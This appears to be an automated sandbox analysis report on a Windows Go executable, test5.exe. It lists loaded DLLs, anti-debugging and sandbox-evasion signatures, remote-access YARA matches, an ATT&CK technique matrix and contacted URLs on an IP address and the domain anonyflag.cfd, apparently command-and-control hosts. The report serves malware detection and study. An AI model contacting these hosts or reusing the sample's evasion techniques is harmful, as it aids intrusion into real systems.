        Source: test5.exeString found in binary or memory: runtime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:sec
        Source: test5.exeString found in binary or memory: /memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspin
        Source: test5.exeString found in binary or memory: /memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspin
        Source: test5.exeString found in binary or memory: /sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack
        Source: test5.exeString found in binary or memory: /sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack
        Source: test5.exeString found in binary or memory: uncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable t
        Source: test5.exeString found in binary or memory: uncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable t
        Source: test5.exeString found in binary or memory: /memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime:
        Source: test5.exeString found in binary or memory: /memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime:
        Source: test5.exeString found in binary or memory: /sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime:
        Source: test5.exeString found in binary or memory: /sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime:
        Source: test5.exeString found in binary or memory: lfstack node allocated from the heap) is larger than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime:
        Source: test5.exeString found in binary or memory: lfstack node allocated from the heap) is larger than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime:
        Source: test5.exeString found in binary or memory: ) is larger than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime:
        Source: test5.exeString found in binary or memory: ) is larger than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime:
        Source: test5.exeString found in binary or memory: runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime:
        Source: test5.exeString found in binary or memory: runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime:
        Source: test5.exeString found in binary or memory: _cgo_pthread_key_created missingruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevruntime: mcall function returnedruntime: newstack called from g=runtime: stack split at bad timepanic while printing panic valueruntime: setevent failed; errno=runtime.semasleep wait_abandoned28421709430404007434844970703125resource temporarily unavailablesoftware caused connection abortnumerical argument out of domainMapIter.Value called before Nextsync: Unlock of unlocked RWMutexsync: negative WaitGroup countergo package net: hostLookupOrder(" not supported for cpu option "mime: expected token after slashuse of closed network connectionunexpected character, want colonCryptAcquireCertificatePrivateKeyGetVolumeNameForVolumeMountPointWInitializeProcThreadAttributeListSetupDiGetDeviceRegistryPropertyWSetupDiSetDeviceRegistryPropertyWcrypto/aes: output not full blockslice bounds out of range [%x:%y]base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativetoo many concurrent timer firingsruntime: name offset out of rangeruntime: type offset out of range142108547152020037174224853515625710542735760100185871124267578125too many levels of symbolic linksreflect: slice index out of range of method on nil interface valuereflect: Field index out of rangereflect: array index out of rangesync: RUnlock of unlocked RWMutexgo package net: confVal.netCgo = GODEBUG: no value specified for "skip everything and stop the walkwaiting for unsupported file typetoo many Answers to pack (>65535)leafCounts[maxBits][maxBits] != nGODEBUG sys/cpu: can not enable "CM_Get_Device_Interface_List_SizeWSetFileCompletionNotificationModescrypto/aes: invalid buffer overlapillegal base64 data at input byte slice bounds out of range [:%x:%y]slice bounds out of range [%x:%y:]out of memory allocating allArenas/memory/classes/heap/objects:bytesruntime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedruntime: source value is too largeVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workentersyscallblock inconsistent bp entersyscallblock inconsistent sp runtime: g is running but p is notinvalid timer channel: no capacity3552713678800500929355621337890625too many references: cannot splicereflect: Field of non-struct ty
        Source: test5.exeString found in binary or memory: _cgo_pthread_key_created missingruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevruntime: mcall function returnedruntime: newstack called from g=runtime: stack split at bad timepanic while printing panic valueruntime: setevent failed; errno=runtime.semasleep wait_abandoned28421709430404007434844970703125resource temporarily unavailablesoftware caused connection abortnumerical argument out of domainMapIter.Value called before Nextsync: Unlock of unlocked RWMutexsync: negative WaitGroup countergo package net: hostLookupOrder(" not supported for cpu option "mime: expected token after slashuse of closed network connectionunexpected character, want colonCryptAcquireCertificatePrivateKeyGetVolumeNameForVolumeMountPointWInitializeProcThreadAttributeListSetupDiGetDeviceRegistryPropertyWSetupDiSetDeviceRegistryPropertyWcrypto/aes: output not full blockslice bounds out of range [%x:%y]base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativetoo many concurrent timer firingsruntime: name offset out of rangeruntime: type offset out of range142108547152020037174224853515625710542735760100185871124267578125too many levels of symbolic linksreflect: slice index out of range of method on nil interface valuereflect: Field index out of rangereflect: array index out of rangesync: RUnlock of unlocked RWMutexgo package net: confVal.netCgo = GODEBUG: no value specified for "skip everything and stop the walkwaiting for unsupported file typetoo many Answers to pack (>65535)leafCounts[maxBits][maxBits] != nGODEBUG sys/cpu: can not enable "CM_Get_Device_Interface_List_SizeWSetFileCompletionNotificationModescrypto/aes: invalid buffer overlapillegal base64 data at input byte slice bounds out of range [:%x:%y]slice bounds out of range [%x:%y:]out of memory allocating allArenas/memory/classes/heap/objects:bytesruntime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedruntime: source value is too largeVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workentersyscallblock inconsistent bp entersyscallblock inconsistent sp runtime: g is running but p is notinvalid timer channel: no capacity3552713678800500929355621337890625too many references: cannot splicereflect: Field of non-struct ty
        Source: test5.exeString found in binary or memory: F:/WebSec/GoCode/pkg/mod/golang.org/toolchain@v0.0.1-go1.23.3.windows-amd64/src/net/addrselect.go
        Source: C:\Users\user\Desktop\test5.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\test5.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\test5.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\test5.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\test5.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\test5.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\test5.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\test5.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\test5.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\test5.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\test5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\test5.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\test5.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\test5.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\test5.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\test5.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\test5.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\test5.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\test5.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\test5.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\test5.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\test5.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\test5.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\test5.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\test5.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\test5.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\test5.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\test5.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\test5.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\test5.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\test5.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\test5.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\test5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
        Source: test5.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
        Source: test5.exeStatic file information: File size 4492800 > 1048576
        Source: test5.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x132200
        Source: test5.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x16f200
        Source: test5.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: test5.exeStatic PE information: section name: .xdata
        Source: test5.exeStatic PE information: section name: /4
        Source: test5.exeStatic PE information: section name: /19
        Source: test5.exeStatic PE information: section name: /32
        Source: test5.exeStatic PE information: section name: /46
        Source: test5.exeStatic PE information: section name: /65
        Source: test5.exeStatic PE information: section name: /78
        Source: test5.exeStatic PE information: section name: /90
        Source: test5.exeStatic PE information: section name: .symtab
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006A54C6 push rsi; retf 002Ch0_2_006A54C7
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_0000021551B0015A push eax; ret 0_2_0000021551B003B6
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_0000021551B00327 push eax; ret 0_2_0000021551B003B6
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_0000021551C1E348 push ebp; iretd 0_2_0000021551C1E34D
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_0000021551BFA35D push edi; iretd 0_2_0000021551BFA35E
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_0000021551BFBD58 push ebp; iretd 0_2_0000021551BFBD59
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_0000021551BFA71E push cs; retf 0_2_0000021551BFA71F
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_0000021551C19758 push ebp; iretd 0_2_0000021551C19759
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_0000021551C1970F push ebp; iretd 0_2_0000021551C19710
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_0000021551C1972F push ebp; iretd 0_2_0000021551C19730
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_0000021553749B65 push cs; retf 0_2_0000021553749B66
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_0000021553768B56 push ebp; iretd 0_2_0000021553768B57
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_000002155374B19F push ebp; iretd 0_2_000002155374B1A0
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_00000215537497A4 push edi; iretd 0_2_00000215537497A5
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_0000021553768B9F push ebp; iretd 0_2_0000021553768BA0
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_0000021553768B76 push ebp; iretd 0_2_0000021553768B77
        Source: C:\Users\user\Desktop\test5.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
        Source: C:\Users\user\Desktop\test5.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
        Source: C:\Users\user\Desktop\test5.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\test5.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\test5.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006F0860 rdtscp0_2_006F0860
        Source: C:\Users\user\Desktop\test5.exe TID: 6560Thread sleep count: 63 > 30Jump to behavior
        Source: C:\Users\user\Desktop\test5.exe TID: 6560Thread sleep time: -3780000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\test5.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\test5.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006B1180 GetProcessAffinityMask,GetSystemInfo,0_2_006B1180
        Source: C:\Users\user\Desktop\test5.exeThread delayed: delay time: 60000Jump to behavior
        Source: test5.exe, 00000000.00000003.2021648405.000002150C7A0000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000002.2903186062.000002150C72C000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1964900061.000002150C7A0000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2116772004.000002150C7A0000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2098334299.000002150C7A0000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2060189313.000002150C7A0000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2079907928.000002150C7A0000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2040694877.000002150C7A0000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2002707961.000002150C7A0000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1983310053.000002150C7A0000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000002.2903186062.000002150C7A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW

        Anti Debugging

        barindex
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006F0860 Start: 006F0869 End: 006F087F0_2_006F0860
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006F0860 rdtscp0_2_006F0860
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_0000021551C04578 GetUserNameA,strrchr,_snprintf,0_2_0000021551C04578
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006B0D80 LoadLibraryExW,LoadLibraryExW,NtCreateWaitCompletionPacket,NtAssociateWaitCompletionPacket,NtCancelWaitCompletionPacket,RtlGetCurrentPeb,RtlGetVersion,0_2_006B0D80

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: Process Memory Space: test5.exe PID: 6608, type: MEMORYSTR
        Source: Yara matchFile source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
        Command and Scripting Interpreter
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        11
        Virtualization/Sandbox Evasion
        OS Credential Dumping1
        Query Registry
        Remote Services1
        Archive Collected Data
        11
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Deobfuscate/Decode Files or Information
        LSASS Memory11
        Security Software Discovery
        Remote Desktop ProtocolData from Removable Media2
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
        Obfuscated Files or Information
        Security Account Manager11
        Virtualization/Sandbox Evasion
        SMB/Windows Admin SharesData from Network Shared Drive2
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Software Packing
        NTDS1
        Account Discovery
        Distributed Component Object ModelInput Capture113
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading
        LSA Secrets1
        System Owner/User Discovery
        SSHKeylogging1
        Proxy
        Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials3
        System Information Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        test5.exe7%VirustotalBrowse
        test5.exe8%ReversingLabs
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://47.90.135.102/0%Avira URL Cloudsafe
        https://anonyflag.cfd/yflag.cfd/p0%Avira URL Cloudsafe
        http://47.90.135.102/2Vcr0%Avira URL Cloudsafe
        https://anonyflag.cfd/tography0%Avira URL Cloudsafe
        https://anonyflag.cfd/yflag.cfd/0%Avira URL Cloudsafe
        https://anonyflag.cfd/~0%Avira URL Cloudsafe
        https://47.90.135.102/2VcrZ0%Avira URL Cloudsafe
        https://anonyflag.cfd/cros0%Avira URL Cloudsafe
        https://anonyflag.cfd/P0%Avira URL Cloudsafe
        https://anonyflag.cfd/G0%Avira URL Cloudsafe
        https://anonyflag.cfd/0%Avira URL Cloudsafe
        https://anonyflag.cfd/image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcno0%Avira URL Cloudsafe
        https://anonyflag.cfd/7h0%Avira URL Cloudsafe
        https://anonyflag.cfd/rovider0%Avira URL Cloudsafe
        https://anonyflag.cfd/yflag.cfd/Y0%Avira URL Cloudsafe
        https://47.90.135.102/2VcrB0%Avira URL Cloudsafe
        https://anonyflag.cfd/Y0%Avira URL Cloudsafe
        https://anonyflag.cfd/iiloksh0%Avira URL Cloudsafe
        https://anonyflag.cfd/de0%Avira URL Cloudsafe
        https://47.90.135.102/2Vcr0%Avira URL Cloudsafe
        http://7.90.135.102:443/2Vcr0%Avira URL Cloudsafe
        https://anonyflag.cfd/dep0%Avira URL Cloudsafe
        https://anonyflag.cfd/Kh0%Avira URL Cloudsafe
        https://anonyflag.cfd/der0%Avira URL Cloudsafe
        https://anonyflag.cfd/vide0%Avira URL Cloudsafe
        https://anonyflag.cfd/Kb0%Avira URL Cloudsafe
        https://anonyflag.cfd/o0%Avira URL Cloudsafe
        https://47.90.135.102/2Vcr.0%Avira URL Cloudsafe
        http://www.google.com40%Avira URL Cloudsafe
        https://anonyflag.cfd/image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        anonyflag.cfd
        104.21.34.5
        truefalse
          unknown
          fp2e7a.wpc.phicdn.net
          192.229.221.95
          truefalse
            high
            NameMaliciousAntivirus DetectionReputation
            http://47.90.135.102/2Vcrtrue
            • Avira URL Cloud: safe
            unknown
            https://47.90.135.102/2Vcrtrue
            • Avira URL Cloud: safe
            unknown
            http://7.90.135.102:443/2Vcrtrue
            • Avira URL Cloud: safe
            unknown
            https://anonyflag.cfd/image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpgfalse
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            https://47.90.135.102/2VcrZtest5.exe, 00000000.00000002.2903186062.000002150C72C000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://anonyflag.cfd/~test5.exe, 00000000.00000002.2903186062.000002150C7E1000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://47.90.135.102/test5.exe, 00000000.00000002.2903186062.000002150C72C000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://anonyflag.cfd/crostest5.exe, 00000000.00000003.2265856992.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2284679172.000002150C81A000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://anonyflag.cfd/Ptest5.exe, 00000000.00000003.2489739391.000002150C81A000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://anonyflag.cfd/yflag.cfd/test5.exe, 00000000.00000003.2700818871.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2681610028.000002150C81A000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://anonyflag.cfd/yflag.cfd/ptest5.exe, 00000000.00000003.2471560155.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2452787669.000002150C81A000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://anonyflag.cfd/tographytest5.exe, 00000000.00000003.2756737494.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2581918132.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2639261263.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2794728878.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2738354693.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2619903564.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2600593531.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2775374438.000002150C81A000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://anonyflag.cfd/Gtest5.exe, 00000000.00000003.2079907928.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2098334299.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2116772004.000002150C7E1000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://anonyflag.cfd/test5.exe, 00000000.00000003.2719078147.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2452787669.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2116772004.000002150C7E1000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://anonyflag.cfd/image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnotest5.exe, 00000000.00000003.2452787669.000002150C81A000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://anonyflag.cfd/7htest5.exe, 00000000.00000003.1796650750.000002150C807000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://anonyflag.cfd/yflag.cfd/Ytest5.exe, 00000000.00000003.2098276910.000002150C81A000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://anonyflag.cfd/rovidertest5.exe, 00000000.00000003.1755611504.000002150C807000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1983310053.000002150C7E1000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://anonyflag.cfd/iilokshtest5.exe, 00000000.00000003.1871884712.000002150C807000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1853432587.000002150C807000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://47.90.135.102/2VcrBtest5.exe, 00000000.00000002.2903186062.000002150C72C000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://anonyflag.cfd/Ytest5.exe, 00000000.00000003.2060130852.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2079665751.000002150C81A000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://anonyflag.cfd/detest5.exe, 00000000.00000003.2342319930.000002150C81A000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
